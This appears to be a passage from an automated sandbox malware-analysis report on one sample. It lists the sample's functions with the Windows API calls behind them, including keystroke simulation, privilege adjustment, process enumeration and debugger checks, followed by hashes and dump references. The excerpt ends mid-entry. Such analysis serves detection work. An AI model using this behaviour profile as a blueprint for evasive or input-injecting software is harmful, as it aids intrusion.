                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                        • String ID:
                                        • API String ID: 1991900642-0
                                        • Opcode ID: f057740f65308a026b7ffe256871739f7d373372503194775b7e3470a23c8273
                                        • Instruction ID: 89e87a785caf9b52f4841c0759c35c5c18f4399e46fc5f2c092366c4434b7ab5
                                        • Opcode Fuzzy Hash: f057740f65308a026b7ffe256871739f7d373372503194775b7e3470a23c8273
                                        • Instruction Fuzzy Hash: 5F5170B19083019FD710EF24C886EABBBE8FF89754F40891DF58997252EB74D905CB92
                                        Function 000DAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 000DAAAC
                                        • SetKeyboardState.USER32(00000080), ref: 000DAAC8
                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 000DAB36
                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 000DAB88
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: 12eb0a46f4ac6b9bea69003887fa560237e9448a9ac131c23d7abf15b992bb60
                                        • Instruction ID: a46c8b1649791ad076a386d4739d3e784c04c990d70d5bedc6b13e008f8f07b0
                                        • Opcode Fuzzy Hash: 12eb0a46f4ac6b9bea69003887fa560237e9448a9ac131c23d7abf15b992bb60
                                        • Instruction Fuzzy Hash: D031D530B40348AEEF358B648C05BFA7BEAAB46320F14421BF581563D2D3758982C7B6
                                        Function 000ABB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 000ABB7F
                                          • Part of subcall function 000A29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000), ref: 000A29DE
                                          • Part of subcall function 000A29C8: GetLastError.KERNEL32(00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000,00000000), ref: 000A29F0
                                        • GetTimeZoneInformation.KERNEL32 ref: 000ABB91
                                        • WideCharToMultiByte.KERNEL32(00000000,?,0014121C,000000FF,?,0000003F,?,?), ref: 000ABC09
                                        • WideCharToMultiByte.KERNEL32(00000000,?,00141270,000000FF,?,0000003F,?,?,?,0014121C,000000FF,?,0000003F,?,?), ref: 000ABC36
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                        • String ID:
                                        • API String ID: 806657224-0
                                        • Opcode ID: 9b913103d088621ad86bdcbcbb0946f78bf56083b54d6f07f755cbf75281fbdc
                                        • Instruction ID: 1d57171605cb38270c8a48c8ad661c82b73f6dc9ad721b2a02f8cdadec741f9e
                                        • Opcode Fuzzy Hash: 9b913103d088621ad86bdcbcbb0946f78bf56083b54d6f07f755cbf75281fbdc
                                        • Instruction Fuzzy Hash: 60319E75944245EFCB11DFA99C8096DBBF8BF47720B24426AE051D72B2D7B09A80CB90
                                        Function 000ECE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 000ECE89
                                        • GetLastError.KERNEL32(?,00000000), ref: 000ECEEA
                                        • SetEvent.KERNEL32(?,?,00000000), ref: 000ECEFE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorEventFileInternetLastRead
                                        • String ID:
                                        • API String ID: 234945975-0
                                        • Opcode ID: 9efb9a7a5d90741fa76099c77799c0d310c2547c3b4cda0ae09705cf9321e4cf
                                        • Instruction ID: d2f132dcf338ce4ccc3606bbb8bf1efb6b297ffe6ba19594cfd44c31a7a701bd
                                        • Opcode Fuzzy Hash: 9efb9a7a5d90741fa76099c77799c0d310c2547c3b4cda0ae09705cf9321e4cf
                                        • Instruction Fuzzy Hash: B921BD71500345AFEB30DFA6C949FAAB7F8EB00354F10442EE546A2652E771EE469BA0
                                        Function 000D8298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 000D82AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: ($|
                                        • API String ID: 1659193697-1631851259
                                        • Opcode ID: b0b5f39229f5a2e0cc7a0fa9431c82d0bcb05e31c56aa0924105f0459b722082
                                        • Instruction ID: 520cb8a7f0c7cc3ff01ee09f7250816f92113d3f9bf9d657377e8aada4221c03
                                        • Opcode Fuzzy Hash: b0b5f39229f5a2e0cc7a0fa9431c82d0bcb05e31c56aa0924105f0459b722082
                                        • Instruction Fuzzy Hash: 7A322674A007059FCB28CF69C481AAAB7F0FF48710B15C56EE59ADB3A1EB70E941CB54
                                        Function 000E5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 000E5CC1
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 000E5D17
                                        • FindClose.KERNEL32(?), ref: 000E5D5F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstNext
                                        • String ID:
                                        • API String ID: 3541575487-0
                                        • Opcode ID: 319d0c6f62fc57315eb32da0ec8ada95d679d53c10b03e6c459e0639766db019
                                        • Instruction ID: 9f7245e4a94e09038bb06be2877805aedfcbeded4b20ab48afc477caacf0733f
                                        • Opcode Fuzzy Hash: 319d0c6f62fc57315eb32da0ec8ada95d679d53c10b03e6c459e0639766db019
                                        • Instruction Fuzzy Hash: E5519E34604A419FC714DF29C894E9AB7E4FF4A318F14895DE99A9B3A2CB30ED44CF91
                                        Function 000A2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 000A271A
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000A2724
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 000A2731
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 6ba4638fb05c1ee91d66929dc91ab671beca7d330bd989e04eb3108eff1e9644
                                        • Instruction ID: 7aebffa3d1fe33c8cc2b55e21b5f21679ac797e42e8ed3626512073a6bdecb97
                                        • Opcode Fuzzy Hash: 6ba4638fb05c1ee91d66929dc91ab671beca7d330bd989e04eb3108eff1e9644
                                        • Instruction Fuzzy Hash: 4931D574911218ABCB21DF68DC887DCB7B8BF08310F5042EAE81CA7261E7709F818F85
                                        Function 000E51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 000E51DA
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 000E5238
                                        • SetErrorMode.KERNEL32(00000000), ref: 000E52A1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DiskFreeSpace
                                        • String ID:
                                        • API String ID: 1682464887-0
                                        • Opcode ID: 92be8cebac8eef7f3cca6b0afad1823f7112ebe002d08afb5617dcf364d1dc00
                                        • Instruction ID: 13589a49cbf41713da592f0fda356047555f976789b079bbe9e139bf52b8e71e
                                        • Opcode Fuzzy Hash: 92be8cebac8eef7f3cca6b0afad1823f7112ebe002d08afb5617dcf364d1dc00
                                        • Instruction Fuzzy Hash: D1317C35A00608DFDB00DF54D884EADBBF4FF49318F048099E909AB3A2DB75E845CB90
                                        Function 000D16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0008FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00090668
                                          • Part of subcall function 0008FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00090685
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000D170D
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000D173A
                                        • GetLastError.KERNEL32 ref: 000D174A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                        • String ID:
                                        • API String ID: 577356006-0
                                        • Opcode ID: 0efc8552c609d3f64a4aa508c2735637ae44a1bd57a37837b8c05fc58b2d8cbf
                                        • Instruction ID: e243e6d00dd017be1ec1ef101f27b705c3d313670c215f98a3ae100b2944328d
                                        • Opcode Fuzzy Hash: 0efc8552c609d3f64a4aa508c2735637ae44a1bd57a37837b8c05fc58b2d8cbf
                                        • Instruction Fuzzy Hash: 7711BFB2404305BFD718AF64DC86DABB7BDFB04714B20852EF49656651EB70BC418B60
                                        Function 000DD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 000DD608
                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 000DD645
                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 000DD650
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle
                                        • String ID:
                                        • API String ID: 33631002-0
                                        • Opcode ID: 49824208a852c182024d868404325fc919fc6d938f10b051951d71a29ce30898
                                        • Instruction ID: 60d516d3fce64110dd37f36a933b98bc75676837c0cea72c079c007ffad2775d
                                        • Opcode Fuzzy Hash: 49824208a852c182024d868404325fc919fc6d938f10b051951d71a29ce30898
                                        • Instruction Fuzzy Hash: 51113C75E05228BBDB208F959C45FAFBBBCEB45B50F108156F904E7290D6B08A058BE1
                                        Function 000D1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 000D168C
                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 000D16A1
                                        • FreeSid.ADVAPI32(?), ref: 000D16B1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                        • String ID:
                                        • API String ID: 3429775523-0
                                        • Opcode ID: c147f8ea5bbd32c483bb66848392bb2520d471da0f95d8d524199aadd8172d19
                                        • Instruction ID: 492d97febd7c0c4c1ae4035336e257b43fabdec3dc7261d63e38fc84d84a5b57
                                        • Opcode Fuzzy Hash: c147f8ea5bbd32c483bb66848392bb2520d471da0f95d8d524199aadd8172d19
                                        • Instruction Fuzzy Hash: 11F0F475950309FBEB00DFE49D89AAEBBBCEB08604F504565F501E2181E774AA448AA0
                                        Function 00094CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(000A28E9,?,00094CBE,000A28E9,001388B8,0000000C,00094E15,000A28E9,00000002,00000000,?,000A28E9), ref: 00094D09
                                        • TerminateProcess.KERNEL32(00000000,?,00094CBE,000A28E9,001388B8,0000000C,00094E15,000A28E9,00000002,00000000,?,000A28E9), ref: 00094D10
                                        • ExitProcess.KERNEL32 ref: 00094D22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: a839483eda70a1f91b5056a7a0b277ffe1b8599ece87e2182085cd4edf2e82a5
                                        • Instruction ID: 433e6f9b70b787221a58bbce53a169009497215a9a5611675826ab57dd234d56
                                        • Opcode Fuzzy Hash: a839483eda70a1f91b5056a7a0b277ffe1b8599ece87e2182085cd4edf2e82a5
                                        • Instruction Fuzzy Hash: 07E0B635015148ABCF15AF54DD09E983B69FB46781B108114FC458A523CB75DD82DE80
                                        Function 000CD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?), ref: 000CD28C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: NameUser
                                        • String ID: X64
                                        • API String ID: 2645101109-893830106
                                        • Opcode ID: f91ab993ad11dd1327e3843cff608302aea2781799642c6796d8ec523dbd45c4
                                        • Instruction ID: 9be90e9cb0484676547d1d785ff98cf2eb2ecb5badd8e7572bf4d67c990313ae
                                        • Opcode Fuzzy Hash: f91ab993ad11dd1327e3843cff608302aea2781799642c6796d8ec523dbd45c4
                                        • Instruction Fuzzy Hash: 88D0C9B480111DEACBA4DB90DC88EDDB37CBB14305F100256F146A2140D77095499F10
                                        Function 0009CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                        • Instruction ID: 484f834056c0be9c8fe20615ff8d9ffac3c1738b7f3b7005c2a2e7e6eed841ac
                                        • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                        • Instruction Fuzzy Hash: 1D022D71E012199FEF14CFA9C890AADFBF1EF48314F258169D819E7381D731AA41DB94
                                        Function 000E68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 000E6918
                                        • FindClose.KERNEL32(00000000), ref: 000E6961
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: 6cfe01698328bf0cd73b1014b0ddd3b3aede215fb389d4cf204ce1ce346867cc
                                        • Instruction ID: 171bc83946cc0130f9f0ec22a7cbf3239a0aa2083d11d6c01373903a235933c6
                                        • Opcode Fuzzy Hash: 6cfe01698328bf0cd73b1014b0ddd3b3aede215fb389d4cf204ce1ce346867cc
                                        • Instruction Fuzzy Hash: 1E11BE316042409FD710DF2AD484A1ABBE5EF85328F14C6A9F4699F6A3CB35EC45CB90
                                        Function 000E37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,000F4891,?,?,00000035,?), ref: 000E37E4
                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,000F4891,?,?,00000035,?), ref: 000E37F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: 46852e5396a35e2523f7f1d1a4a0528c85ed239076ee9b7065528fbb7126564d
                                        • Instruction ID: 4db4b28bd845081df9810690fdd71a0905ec3c1cded1f115e56f7e9ba335eb97
                                        • Opcode Fuzzy Hash: 46852e5396a35e2523f7f1d1a4a0528c85ed239076ee9b7065528fbb7126564d
                                        • Instruction Fuzzy Hash: EDF0E5B06052292AEB2017678C4DFEB3AAEEFC4761F000275F509E3681D9A09944CAF0
                                        Function 000DB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 000DB25D
                                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 000DB270
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: InputSendkeybd_event
                                        • String ID:
                                        • API String ID: 3536248340-0
                                        • Opcode ID: d405195b91607709602f36acda7fa937e9bc24bdc4b371e5e61a494cce0bbd05
                                        • Instruction ID: 27f7dcb851412d2c73502b16f6861fbc414034d24cb23029ec1b39eb9a797a60
                                        • Opcode Fuzzy Hash: d405195b91607709602f36acda7fa937e9bc24bdc4b371e5e61a494cce0bbd05
                                        • Instruction Fuzzy Hash: E7F01D7590428EABDB159FA0C805BBE7BB4FF04305F00800AF955A5191C7B986519FA4
                                        Function 000D10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                        Download Yara Rule
                                        APIs
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000D11FC), ref: 000D10D4
                                        • CloseHandle.KERNEL32(?,?,000D11FC), ref: 000D10E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
